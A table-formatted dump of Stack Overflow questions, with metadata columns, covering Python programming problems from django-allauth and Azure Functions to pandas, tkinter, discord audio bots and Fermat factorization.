QuestionId
int64 74.8M
79.8M
| UserId
int64 56
29.4M
| QuestionTitle
stringlengths 15
150
| QuestionBody
stringlengths 40
40.3k
| Tags
stringlengths 8
101
| CreationDate
stringdate 2022-12-10 09:42:47
2025-11-01 19:08:18
| AnswerCount
int64 0
44
| UserExpertiseLevel
int64 301
888k
| UserDisplayName
stringlengths 3
30
⌀ |
|---|---|---|---|---|---|---|---|---|
79,368,426
| 995,071
|
django-allauth with steam
|
<p>as describe in this <a href="https://github.com/pennersr/django-allauth/issues/3516" rel="nofollow noreferrer">issue on github</a>, my login method which is working by the way, seems to throw an exception everytime it is used:</p>
<pre><code>Missing required parameter in response from https://steamcommunity.com/openid/login: ('http://specs.openid.net/auth/2.0', 'assoc_type')
Traceback (most recent call last):
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/message.py", line 481, in getArg
return self.args[args_key]
~~~~~~~~~^^^^^^^^^^
KeyError: ('http://specs.openid.net/auth/2.0', 'assoc_type')
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/consumer/consumer.py", line 1286, in _requestAssociation
assoc = self._extractAssociation(response, assoc_session)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/consumer/consumer.py", line 1402, in _extractAssociation
assoc_type = assoc_response.getArg(OPENID_NS, 'assoc_type', no_default)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/negstek/.cache/pypoetry/virtualenvs/django-all-auth-to-steam-83qxtO4Z-py3.11/lib/python3.11/site-packages/openid/message.py", line 484, in getArg
raise KeyError((namespace, key))
KeyError: ('http://specs.openid.net/auth/2.0', 'assoc_type')
</code></pre>
<p>assoc_type is misssing from steam respone. These are my app settings:</p>
<pre><code>INSTALLED_APPS = [
...
# social providers
"allauth.socialaccount.providers.openid",
"allauth.socialaccount.providers.steam",
...
]
MIDDLEWARE = [
...
"allauth.account.middleware.AccountMiddleware", # social providers
...
]
AUTHENTICATION_BACKENDS = (
"allauth.account.auth_backends.AuthenticationBackend",
"django.contrib.auth.backends.ModelBackend",
)
SOCIALACCOUNT_PROVIDERS = {
"steam": {
"APP": {
"client_id": STEAM_SECRET_KEY,
"secret": STEAM_SECRET_KEY,
}
},
}
</code></pre>
<p>Did I miss something in my implementation ? Is there a way to avoid the raising of this exception ?</p>
|
<python><django><django-allauth><steam>
|
2025-01-19 04:38:53
| 1
| 701
|
negstek
|
79,368,424
| 1,413,856
|
How can I add a menu before the first in Python tkInter?
|
<p>I’m writing some code to add a menu to a tkInter application. Here is a working sample:</p>
<pre class="lang-py prettyprint-override"><code>import tkinter
main = tkinter.Tk()
main.title('Menu Test')
menubar = tkinter.Menu(main)
main['menu'] = menubar
m = tkinter.Menu()
menubar.add_cascade(menu=m, label='First')
m.add_command(label='Thing', command=lambda: print('thing'))
m = tkinter.Menu()
menubar.add_cascade(menu=m, label='Second')
m.add_command(label='Whatever', command=lambda: print('whatever'))
# How to add another menu before 'First' ?
main.mainloop()
</code></pre>
<p>Is it possible to add another menu <em>before</em> the first menu (<code>First</code>) ?</p>
<p>Obviously, in this simple case, I can simply define it first, but I want to write a routine which populates a menu from a dictionary.</p>
|
<python><tkinter><menu>
|
2025-01-19 04:38:01
| 2
| 16,921
|
Manngo
|
79,368,402
| 19,459,262
|
How to switch to a certain navigation panel when a button is clicked?
|
<p>I have an app written in Shiny for Python with several nav panels. On the front page, which the user gets sent to first, I have one button for each other nav panel. Is there any way for me to add functionality so that clicking a button sends you to the appropriate nav panel?</p>
<p>I've found ways to do this in R Shiny, but none in Shiny for Python.</p>
<p>Example code:</p>
<pre><code>from shiny import App, Inputs, Outputs, Session, reactive, render, req, ui
from shiny.express import input, ui
with ui.nav_panel('Start'):
ui.input_action_button("move_to_panel_1", "Move to panel 1") # clicking this moves you to panel 1
ui.input_action_button("move_to_panel_2", "Move to panel 2") # to panel 2
with ui.nav_panel('Panel 1'):
with ui.card():
@render.text
def text1():
return 'Text 1'
with ui.nav_panel('Panel 2'):
with ui.card():
@render.text
def text2():
return 'Text 2'
</code></pre>
|
<python><navigation><shiny-reactivity><py-shiny>
|
2025-01-19 04:18:27
| 1
| 784
|
Redz
|
79,368,190
| 10,415,492
|
Removing rows from numpy 3D array based on last element
|
<p>What I'm trying to do is essentially removing all rows <code>h,s</code> in a 3D numpy array <code>a</code> if <code>a[h,s,v] = some value</code> for all <code>v</code></p>
<p>More specifically, I have a loaded image from <code>cv2</code> which contains some transparent pixels. I'd like to create an HSV histogram without including the transparent pixels (i.e. <code>k=255</code>)</p>
<p>Here's what I have now:</p>
<pre class="lang-py prettyprint-override"><code>import cv2
import numpy as np
IMAGE_FILE = './images/2024-11-17/00.png' # load image with some transparent pixels
# Read image into HSV
image = cv2.imread(IMAGE_FILE)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# Remove all pixels with V = 255
hsv_removed_transparency = []
i = np.where(hsv[:, :, 2] == 255) # indices of pixels with V = 255
for i1 in range(len(i[0])):
hsv_removed_transparency.append(np.delete(hsv[i[0][i1]], i[1][i1], axis=0)
</code></pre>
|
<python><numpy><opencv><numpy-ndarray>
|
2025-01-19 00:37:14
| 1
| 435
|
Omaro_IB
|
79,368,152
| 9,780,838
|
Azure App Functions, Storage queue trigger
|
<p>I am new to using Azure App functions and i am exploring of using queue storage with my function. my runtime is python. i am deploying my function via Vscode. i am facing a challenge when i add my configuration such as my evns and endpoints at the global level and deploy my function, my function is no longer available. here is my code,</p>
<pre><code>import os
import requests
import logging
from datetime import datetime
from azure.storage.blob.aio import BlobServiceClient
import azure.functions as func
import asyncio
import json
import aiohttp
from isodate import parse_duration
import numpy as np
from ruptures.detection import Pelt
import librosa
import tempfile
import time
# --- Azure Function Configuration ---
# Replace with your actual values
STORAGE_CONNECTION_STRING = os.environ["AzureWebJobsStorage"] # Use single connection string if same
SOURCE_CONTAINER_NAME = os.environ["STORAGE_CONNECTION_STRING"]
DESTINATION_CONTAINER_NAME = os.environ["DESTINATION_CONTAINER_NAME"]
SPEECH_API_KEY = os.environ["SPEECH_API_KEY"]
YOUR_SAS_TOKEN = os.environ["YOUS_SAS_TOKEN"]
# --- Logging Configuration ---
logging.basicConfig(level=logging.INFO)
# --- Speech to Text API Configuration (with v3.2) ---
endpoint = "https://my-speech-name.cognitiveservices.azure.com/speechtotext/v3.2/transcriptions"
headers = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": SPEECH_API_KEY
}
app = func.FunctionApp()
@app.function_name(name="sttqueue")
@app.queue_trigger(arg_name="msg",
queue_name="transcription-queue",
connection="AzureWebJobsStorage")
async def sttqueue(msg: func.QueueMessage):
logging.info('Python Queue trigger function processed a queue item: %s', msg.get_body().decode('utf-8'))
try:
batch = json.loads(msg.get_body().decode('utf-8'))
logging.info(f"Processing batch: {batch}")
source_blob_client = BlobServiceClient.from_connection_string(STORAGE_CONNECTION_STRING)
destination_blob_client = BlobServiceClient.from_connection_string(STORAGE_CONNECTION_STRING)
async with source_blob_client, destination_blob_client:
source_container_client = source_blob_client.get_container_client(SOURCE_CONTAINER_NAME)
destination_container_client = destination_blob_client.get_container_client(DESTINATION_CONTAINER_NAME)
async with aiohttp.ClientSession() as session:
for blob_name in batch:
blob_url = f"https://{source_container_client.account_name}.blob.core.windows.net/{source_container_client.container_name}/{blob_name}?{YOUR_SAS_TOKEN}"
await transcribe_audio(blob_name, blob_url, session, destination_container_client, endpoint, headers)
except Exception as e:
logging.error(f"Error processing queue message: {e}")
async def transcribe_audio(blob_name, blob_url, session, destination_container_client, endpoint, headers):
try:
# . endpoint and headers)
except aiohttp.ClientError as e:
logging.error(f"Error communicating with Speech API: {e}")
except azure.core.exceptions.AzureError as e:
logging.error(f"Error accessing Azure Storage: {e}")
except Exception as e:
logging.error(f"Error transcribing {blob_name}: {e}")
return app # Return the Function App object
</code></pre>
<p><a href="https://i.sstatic.net/DettY04E.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/DettY04E.png" alt="no available func" /></a></p>
<p>however, when i comment out my env and endpoints, my function is deployed without any issues.</p>
<p><a href="https://i.sstatic.net/BA7Skxzu.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BA7Skxzu.png" alt="enter image description here" /></a></p>
<p>as you can see after removing the config envs and endpoint, the function is available along with the trigger. what am i doing wrong ? Any suggestions to fix this issue ?</p>
|
<python><azure><function><speech-to-text>
|
2025-01-18 23:54:19
| 1
| 321
|
M B
|
79,368,128
| 11,222,417
|
how to generate value for python defaultdict based on the key
|
<p>In python, is it possible to generate a value for a defaultdict which is a function of the key?
For example:</p>
<pre><code>from collections import defaultdict
d = defaultdict(lambda key=None: key * 2)
</code></pre>
<p>so that <code>d[1]</code> will produces the value 2.</p>
|
<python><defaultdict>
|
2025-01-18 23:25:40
| 1
| 305
|
J. Doe
|
79,368,119
| 412,252
|
Scheduling periodic RQ tasks, using asyncio
|
<h4>I think that the architecture of RQ Scheduler is fundamentally flawed and it's much more complicated than it needs to be.</h4>
<p><strong>Schedules are stored in Redis</strong><br />
Even if you remove or modify your scheduling code, the old schedules remain in Redis until explicitly canceled.</p>
<p><strong>Non-declarative model</strong><br />
Simply deleting the <code>scheduler.cron(...)</code> line does not remove the schedule; you must manually run <code>scheduler.cancel(job_id)</code>.</p>
<p><strong><code>rqscheduler</code> doesn’t run your code</strong><br />
The <code>rqscheduler</code> command only polls Redis for due jobs. It does not import or execute your Python code to dynamically update schedules.</p>
<p><strong>No built-in reconciliation</strong><br />
You must handle the lifecycle of scheduled jobs—adding, updating, or removing them—on your own, often requiring extra scripts or manual processes.</p>
<h4>I strongly prefer Celery Beat's approach of dispatching / enqueuing tasks, from my python code, exactly when they are scheduled to run.</h4>
<p>However, in this particular project, I'm using RQ and thus, Celery Beat is unavailable to me.</p>
<p>How can I create something simple that takes cron strings and works in similar way to Celery Beat?</p>
|
<python><cron><python-asyncio><scheduler><rq>
|
2025-01-18 23:16:49
| 1
| 4,674
|
demux
|
79,367,766
| 19,082,083
|
How can I ensure that Azure Text-to-Speech properly pronounces word-for-word translations?
|
<p>I'm working on an app using Azure, Gemini, Python, and Dart, and I want to make sure the pronunciation between languages is spot on. For example, I want to translate between German and Spanish: the goal is for 'hallo' -> 'hola' to be pronounced correctly in both languages. The same goes for English and Spanish 'hello' -> 'hola'. Azure does well with sentences, but struggles with word-for-word translations.</p>
<p>Here's my code:</p>
<ul>
<li>translation_service.py</li>
</ul>
<pre class="lang-py prettyprint-override"><code>
class TranslationService:
def __init__(self):
load_dotenv()
api_key = os.getenv("GEMINI_API_KEY")
if not api_key:
raise ValueError("GEMINI_API_KEY not found in environment variables")
genai.configure(api_key=api_key)
self.generation_config = {
"temperature": 1,
"top_p": 0.95,
"top_k": 40,
"max_output_tokens": 8192,
"response_mime_type": "text/plain",
}
self.model = GenerativeModel(
model_name="gemini-2.0-flash-exp",
generation_config=self.generation_config
)
self.tts_service = EnhancedTTSService()
# Initialize chat session with translation instructions
self.chat_session = self.model.start_chat(
history=[
{
"role": "user",
"parts": [
"""
Text
"
(Could be any phrase or word)
"
German Translation:
Conversational-native:
"Ich suche einen Job, damit ich finanziell unabhängig sein kann."
word by word Conversational-native German-Spanish:
"Ich (Yo) suche (busco) einen (un) Job (trabajo), damit (para que) ich (yo) finanziell (económicamente) unabhängig (independiente) sein (ser) kann (pueda)."
English Translation:
Conversational-native:
"I'm looking for a job so I can be financially independent."
word by word Conversational-native English-Spanish:
"I'm (Yo estoy) looking for (buscando) a job (un trabajo) so (para que) I (yo) can be (pueda ser) financially (económicamente) independent (independiente)."
"""
]
}
]
)
def _restore_accents(self, text: str) -> str:
"""Restore proper accents and special characters."""
accent_map = {
"a": "á", "e": "é", "i": "í", "o": "ó", "u": "ú", "n": "ñ",
"A": "Á", "E": "É", "I": "Í", "O": "Ó", "U": "Ú", "N": "Ñ",
}
patterns = {
r"([aeiou])´": lambda m: accent_map[m.group(1)],
r"([AEIOU])´": lambda m: accent_map[m.group(1)],
r"n~": "ñ",
r"N~": "Ñ",
}
for pattern, replacement in patterns.items():
if callable(replacement):
text = re.sub(pattern, replacement, text)
else:
text = re.sub(pattern, replacement, text)
return text
async def process_prompt(self, text: str, source_lang: str, target_lang: str) -> Translation:
try:
response = self.chat_session.send_message(text)
generated_text = response.text
print(f"Generated text from Gemini: {generated_text[:100]}...")
audio_filename = await self.tts_service.text_to_speech(
text=generated_text
)
if audio_filename:
print(f"Successfully generated audio: {audio_filename}")
else:
print("Audio generation failed")
return Translation(
original_text=text,
translated_text=generated_text,
source_language=source_lang,
target_language=target_lang,
audio_path=audio_filename,
translations={"main": generated_text},
word_by_word=self._generate_word_by_word(text, generated_text),
grammar_explanations=self._generate_grammar_explanations(generated_text)
)
except Exception as e:
print(f"Error in process_prompt: {str(e)}")
raise Exception(f"Translation processing failed: {str(e)}")
def _generate_word_by_word(self, original: str, translated: str) -> dict[str, dict[str, str]]:
"""Generate word-by-word translation mapping."""
result = {}
original_words = original.split()
translated_words = translated.split()
for i, word in enumerate(original_words):
if i < len(translated_words):
result[word] = {
"translation": translated_words[i],
"pos": "unknown",
}
return result
def _auto_fix_spelling(self, text: str) -> str:
"""Fix spelling in the given text."""
words = re.findall(r"\b\w+\b|[^\w\s]", text)
corrected_words = []
for word in words:
if not re.match(r"\w+", word):
corrected_words.append(word)
continue
if self.spell.unknown([word]):
correction = self.spell.correction(word)
if correction:
if word.isupper():
correction = correction.upper()
elif word[0].isupper():
correction = correction.capitalize()
word = correction
corrected_words.append(word)
return " ".join(corrected_words)
</code></pre>
<ul>
<li>tts_service.py</li>
</ul>
<pre class="lang-py prettyprint-override"><code>
from azure.cognitiveservices.speech.audio import AudioOutputConfig
import os
from typing import Optional
from datetime import datetime
import asyncio
import re
class EnhancedTTSService:
def __init__(self):
# Initialize Speech Config
self.subscription_key = os.getenv("AZURE_SPEECH_KEY")
self.region = os.getenv("AZURE_SPEECH_REGION")
if not self.subscription_key or not self.region:
raise ValueError("Azure Speech credentials not found in environment variables")
# Create speech config
self.speech_config = SpeechConfig(
subscription=self.subscription_key,
region=self.region
)
self.speech_config.set_speech_synthesis_output_format(
SpeechSynthesisOutputFormat.Audio16Khz32KBitRateMonoMp3
)
# Voice mapping with specific styles and roles
self.voice_mapping = {
'en': 'en-US-JennyMultilingualNeural',
'es': 'es-ES-ArabellaMultilingualNeural',
'de': 'de-DE-SeraphinaMultilingualNeural'
}
def _get_temp_directory(self) -> str:
"""Create and return the temporary directory path"""
if os.name == 'nt': # Windows
temp_dir = os.path.join(os.environ.get('TEMP', ''), 'tts_audio')
else: # Unix/Linux
temp_dir = '/tmp/tts_audio'
os.makedirs(temp_dir, exist_ok=True)
return temp_dir
def _detect_language(self, text: str) -> str:
"""Detect the primary language of the text"""
# Simple language detection based on character patterns
if re.search(r'[äöüßÄÖÜ]', text):
return 'de'
elif re.search(r'[áéíóúñ¿¡]', text):
return 'es'
return 'en'
def _generate_ssml(self, text: str) -> str:
"""Generate valid SSML with proper escaping and language tags"""
# Clean the text
text = text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
# Detect primary language
primary_lang = self._detect_language(text)
voice_name = self.voice_mapping.get(primary_lang, self.voice_mapping['en'])
ssml = f"""<?xml version='1.0'?>
<speak version='1.0' xmlns='http://www.w3.org/2001/10/synthesis' xml:lang='{primary_lang}'>
<voice name='{voice_name}'>
<prosody rate="0.95" pitch="0%">
{text}
</prosody>
</voice>
</speak>"""
return ssml
async def text_to_speech(self, text: str, output_path: Optional[str] = None) -> Optional[str]:
"""Convert text to speech with robust error handling"""
synthesizer = None
try:
print(f"\nStarting TTS process for text: {text[:100]}...") # First 100 chars
# Generate output path if not provided
if not output_path:
temp_dir = self._get_temp_directory()
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
output_path = os.path.join(temp_dir, f"speech_{timestamp}.mp3")
# Configure audio output
audio_config = AudioOutputConfig(filename=output_path)
# Create synthesizer for this request
synthesizer = SpeechSynthesizer(
speech_config=self.speech_config,
audio_config=audio_config
)
# Generate and validate SSML
ssml = self._generate_ssml(text)
print(f"Generated SSML length: {len(ssml)} characters")
# Perform synthesis
print("Starting speech synthesis...")
result = await asyncio.get_event_loop().run_in_executor(
None,
lambda: synthesizer.speak_ssml_async(ssml).get()
)
# Handle result
if result.reason == ResultReason.SynthesizingAudioCompleted:
print("Speech synthesis completed successfully")
return os.path.basename(output_path)
elif result.reason == ResultReason.Canceled:
print(f"Speech synthesis canceled: {result.cancellation_details.reason}")
print(f"Error details: {result.cancellation_details.error_details}")
return None
return None
except Exception as e:
print(f"Exception in text_to_speech: {str(e)}")
return None
finally:
# Proper cleanup
if synthesizer:
try:
synthesizer.stop_speaking_async()
except:
pass
</code></pre>
<hr />
<p>This is an example of how the correct pronunciation should sound:</p>
<p>German-Spanish (hello example) (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/8sftiJ01aUreR3LDYRWn" rel="nofollow noreferrer">https://jmp.sh/s/8sftiJ01aUreR3LDYRWn</a></p>
<p>English-Spanish (hello example) (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/9MM1LqTqGH1CvddGhA1l" rel="nofollow noreferrer">https://jmp.sh/s/9MM1LqTqGH1CvddGhA1l</a></p>
<p>Now let’s do a word-for-word translation, where we’ll focus on pronouncing the Spanish "ñ," "h," and "ll" properly.</p>
<p>Here’s the Spanish sentence:</p>
<p>"Jugo de piña para la niña y jugo de mora para la señora porque están en el hospital y afuera está lloviendo."</p>
<p>Translation:</p>
<p>"I got pineapple juice for the girl and blackberry juice for the lady because they’re in the hospital and it’s raining outside."</p>
<p>German-Spanish (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/s/aRFlpZc99Dw18Uexi8uS" rel="nofollow noreferrer">https://jmp.sh/s/aRFlpZc99Dw18Uexi8uS</a></p>
<p>English-Spanish (this is the desired output with the correct word-for-word pronunciation)</p>
<p><a href="https://jmp.sh/eY9ZhlTi" rel="nofollow noreferrer">https://jmp.sh/eY9ZhlTi</a></p>
<hr />
<p>Currently I have this pronunciation with the same examples</p>
<p>German-Spanish and English-Spanish (hello example) (which is incorrect because the word-for-word pronunciation is not accurate)</p>
<p><a href="https://jmp.sh/iExSVBGk" rel="nofollow noreferrer">https://jmp.sh/iExSVBGk</a></p>
<p>Let’s go back to the word-for-word breakdown, again emphasizing Spanish pronunciation for the tricky letters:</p>
<p>"ñ" (sounds like “ny” in canyon, e.g., piña, niña)
"h" (silent in Spanish, e.g., hospital)
"ll" (varies regionally but often sounds like “y” in yes, e.g., lloviendo).
So here’s the sentence again:</p>
<p>"Jugo de piña para la niña y jugo de mora para la señora porque están en el hospital y afuera está lloviendo."</p>
<p>Translation:</p>
<p>"I got pineapple juice for the girl and blackberry juice for the lady because they’re in the hospital and it’s raining outside."</p>
<p>German-Spanish and English-Spanish (which is incorrect because the word-for-word pronunciation is not accurate)</p>
<p><a href="https://jmp.sh/PxKHNWjx" rel="nofollow noreferrer">https://jmp.sh/PxKHNWjx</a></p>
<hr />
<p>This is the service I use with Azure:</p>
<p><a href="https://i.sstatic.net/XI2UDAIc.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/XI2UDAIc.png" alt="This is the service I use with Azure" /></a></p>
<p>I’ve tried the 'langid' library, but it seems like it doesn’t work for me. My goal is to be able to hear the correct pronunciation of the English-Spanish and German-Spanish word pairs during word-for-word translation.</p>
<p>Thank you.</p>
|
<python><azure><azure-functions><google-gemini><language-translation>
|
2025-01-18 18:37:02
| 1
| 972
|
pomoworko.com
|
79,367,707
| 1,788,656
|
TypeError: Index.reindex() got an unexpected keyword argument ‘fill_value'
|
<p>I am trying to get the indices of the missing date by comparing it to a list of un-missed dates, as the following:</p>
<pre><code>a = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
"2004", "2005", "2009", "2010"])
b = pd.DatetimeIndex(["2000", "2001", "2002", "2003",
"2004", "2005", "2006", "2007",
"2008", "2009", "2010"])
a.reindex(b)
</code></pre>
<p>I got the following</p>
<pre><code>(DatetimeIndex(['2000-01-01', '2001-01-01', '2002-01-01', '2003-01-01',
'2004-01-01', '2005-01-01', '2006-01-01', '2007-01-01',
'2008-01-01', '2009-01-01', '2010-01-01'],
dtype='datetime64[ns]', freq=None),
array([ 0, 1, 2, 3, 4, 5, -1, -1, -1, 6, 7]))
</code></pre>
<p>I tried to replace all missing value which is -1 to Nan, by using <code>a.reindex(b, fill_value=np.NAN)</code> but I got the following error <code>TypeError: Index.reindex() got an unexpected keyword argument ‘fill_value’</code></p>
<p>According the <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.reindex.html" rel="nofollow noreferrer">pandas documentation</a> fill_vaue is among the parameters of reindex.
Any ideas?</p>
|
<python><pandas><datetime>
|
2025-01-18 18:01:19
| 2
| 725
|
Kernel
|
79,367,539
| 561,243
|
mypy does not install types-seaborn automatically
|
<p>I am working on a library package that depends on some other libraries and I statically type checking my code.</p>
<p>When running mypy (version 1.14.0) the first time on a freshly created enviroment, mypy finds the external libraries (for example peewee) and installs automatically the types-stubs from typeshed. But it does not install types-seaborn. So far this is the one and only exception to the rule.</p>
<p>If I install it manually with:</p>
<pre class="lang-none prettyprint-override"><code>pip install types-seaborn
</code></pre>
<p>then mypy runs without any problem.</p>
<p>As a workaround I have explicitly added the types-seaborn dependency to the pyproject.toml file, but I would have preferred the automatic behavior.</p>
<p>Do you know why this is happening and how can I fix it?</p>
|
<python><seaborn><mypy><typeshed>
|
2025-01-18 16:40:07
| 1
| 367
|
toto
|
79,367,477
| 10,778,270
|
ffmpeg process 20564 successfully terminated with return code of 3436169992
|
<p>Trying to play a youtube video as audio through a discord bot. I ran into a 403 forbidden error and added the YDL_OPTIONS to bypass this. Now the code throws the error code 3436169992.The bot writes to the server "now playing: xxxx" but no audio is played. Any pointers?</p>
<pre><code>FFMPEG_OPTIONS = {
"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5",
"options": "-vn -filter:a \"volume=0.25\""
}
# yt-dlp options
YDL_OPTIONS = {
"format": "bestaudio[ext=webm][acodec=opus]/bestaudio",
"noplaylist": True,
"quiet": True,
"extract_flat": False,
"no_warnings": True,
"source_address": "0.0.0.0" # Prevents YouTube throttling
}
voice_clients = {}
@bot.event
async def on_message(message):
if message.content.startswith("-play"):
try:
# Ensure the user is in a voice channel
if not message.author.voice:
await message.channel.send("You need to be in a voice channel to use this command.")
return
# Connect to the user's voice channel if not already connected
if message.guild.id not in voice_clients or not voice_clients[message.guild.id].is_connected():
voice_client = await message.author.voice.channel.connect()
voice_clients[message.guild.id] = voice_client
else:
voice_client = voice_clients[message.guild.id]
# Extract the YouTube URL from the command
url = message.content.split()[1]
# Download and extract audio using yt-dlp
with YoutubeDL(YDL_OPTIONS) as ydl:
info = ydl.extract_info(url, download=False)
audio_url = info["url"]
title = info.get("title", "Unknown Title")
# Debug: Print the extracted audio URL
print(f"Audio URL: {audio_url}")
# Play the audio using FFmpeg
source = FFmpegPCMAudio(audio_url, **FFMPEG_OPTIONS)
voice_client.play(source, after=lambda e: print("Playback finished."))
# Notify the user
await message.channel.send(f"Now playing: {title}")
except Exception as e:
print(f"Error: {e}")
await message.channel.send("An error occurred while trying to play the audio.")
</code></pre>
|
<python><ffmpeg><discord>
|
2025-01-18 16:08:21
| 0
| 317
|
Deeroy
|
79,367,389
| 14,358,734
|
Why am I getting "raise source.error("multiple repeat", re.error: multiple repeat at position 2" when trying to save data frames to csv files?
|
<p>The code is attached below. It works fine until it gets to <code>ai: df_ai</code> in the <code>database</code> dict.</p>
<pre><code>data = pd.read_csv('survey_results_public.csv')
df_demographics = data[['ResponseId', 'MainBranch', 'Age', 'Employment', 'EdLevel', 'YearsCode', 'Country']]
df_learn_code = data[['ResponseId', 'LearnCode']]
df_language = data[['ResponseId', 'LanguageAdmired']]
df_ai = data[['ResponseId', 'AISelect', 'AISent', 'AIAcc', 'AIComplex', 'AIThreat', 'AIBen', 'AIToolCurrently Using']]
database = {'demographics': df_demographics, 'learn_code': df_learn_code, 'language': df_language, 'ai': df_ai}
def find_semicolons(dataframe):
result = []
firstFifty = dataframe.head(50)
for column in firstFifty.columns:
if firstFifty[column].apply(lambda x: ';' in str(x)).any():
result.append(column)
return result
def transform_dataframe(dataframe):
result = find_semicolons(dataframe)
for column in result:
values = [str(x).split(';') for x in dataframe[column].unique().tolist()]
flat_values = []
for x in values:
flat_values.extend(x)
flat_values = set(flat_values)
for x in flat_values:
dataframe[x] = dataframe[column].str.contains(x, na=False).astype(int)
for x in database:
transform_dataframe(database.get(x))
database.get(x).to_csv(x + '.csv')
</code></pre>
<p>Here's the traceback</p>
<pre><code>Traceback (most recent call last):
File "/Users/shalim/PycharmProjects/work/stackoverflow.py", line 45, in <module>
transform_dataframe(database.get(x))
File "/Users/shalim/PycharmProjects/work/stackoverflow.py", line 40, in transform_dataframe
dataframe[x] = dataframe[column].str.contains(x, na=False).astype(int)
File "/Users/shalim/PycharmProjects/work/venv/lib/python3.9/site-packages/pandas/core/strings/accessor.py", line 137, in wrapper
return func(self, *args, **kwargs)
File "/Users/shalim/PycharmProjects/work/venv/lib/python3.9/site-packages/pandas/core/strings/accessor.py", line 1327, in contains
if regex and re.compile(pat).groups:
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/re.py", line 252, in compile
return _compile(pattern, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/re.py", line 304, in _compile
p = sre_compile.compile(pattern, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_compile.py", line 764, in compile
p = sre_parse.parse(p, flags)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 948, in parse
p = _parse_sub(source, state, flags & SRE_FLAG_VERBOSE, 0)
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 443, in _parse_sub
itemsappend(_parse(source, state, verbose, nested + 1,
File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/sre_parse.py", line 671, in _parse
raise source.error("multiple repeat",
re.error: multiple repeat at position 2
</code></pre>
|
<python><pandas><dataframe>
|
2025-01-18 15:08:59
| 1
| 781
|
m. lekk
|
79,366,943
| 14,358,734
|
Best way to turn every cell in a dataframe into its own row in a new dataframe?
|
<p>Suppose I have a dataframe <code>Old</code> with columns <code>A</code>, <code>B</code>, and <code>C</code>. I want a new dataframe <code>New</code> where two columns <code>D</code> and <code>E</code>. For each cell in <code>Old</code>, I want a corresponding row in the <code>D</code> column in <code>New</code> where the value in <code>E</code> is the name of the column the cell was in.</p>
<p>I know that straight up iterating over a dataframe is bad, but that's how I did it. Here, I only cared about some column names in the <code>Old</code> dataframe, so if the cell wasn't under a column I cared about, I just assigned it the value <code>other</code>. But the principle is the same.</p>
<pre><code>for column in df.columns:
for entry in df[column]:
entries.append(entry)
labels.append(column_labels.get(column, "other")) # Assign label based on column
</code></pre>
<p>My question is what are some better ways to do this? Running this will become exceedingly slow as the dataset grows.</p>
|
<python><pandas><dataframe>
|
2025-01-18 10:13:46
| 1
| 781
|
m. lekk
|
79,366,590
| 16,383,578
|
How to correctly implement Fermat's factorization in Python?
|
<p>I am trying to implement efficient prime factorization algorithms in Python. This is not homework or work related, it is completely out of curiosity.</p>
<p>I have learned that prime factorization is <a href="https://en.wikipedia.org/wiki/Integer_factorization#Time_complexity" rel="nofollow noreferrer">very hard</a>:</p>
<p>I want to implement efficient algorithms for this as a self-imposed challenge. I have set to implement <a href="https://en.wikipedia.org/wiki/Fermat%27s_factorization_method" rel="nofollow noreferrer">Fermat's factorization method</a> first as it seems simple enough.</p>
<p>Python code directly translated from the pseudocode:</p>
<pre><code>def Fermat_Factor(n):
a = int(n ** 0.5 + 0.5)
b2 = abs(a**2 - n)
while int(b2**0.5) ** 2 != b2:
a += 1
b2 = a**2 - n
return a - b2**0.5, a + b2**0.5
</code></pre>
<p>(I have to use <code>abs</code> otherwise <code>b2</code> will easily be negative and <code>int</code> cast will fail with <code>TypeError</code> because the root is <code>complex</code>)</p>
<p>As you can see, it returns two integers whose product equals the input, but it only returns two outputs and it doesn't guarantee primality of the factors. I have no idea how efficient this algorithm is, but factorization of semiprimes using this method is much more efficient than the trial division method used in my previous question: <a href="https://stackoverflow.com/questions/79365706/">Why factorization of products of close primes is much slower than products of dissimilar primes</a>.</p>
<pre><code>In [20]: %timeit FermatFactor(3607*3803)
2.1 μs ± 28.2 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [21]: FermatFactor(3607*3803)
Out[21]: [3607, 3803]
In [22]: %timeit FermatFactor(3593 * 3671)
1.69 μs ± 31 ns per loop (mean ± std. dev. of 7 runs, 1,000,000 loops each)
In [23]: FermatFactor(3593 * 3671)
Out[23]: [3593, 3671]
In [24]: %timeit FermatFactor(7187 * 7829)
4.94 μs ± 47.4 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [25]: FermatFactor(7187 * 7829)
Out[25]: [7187, 7829]
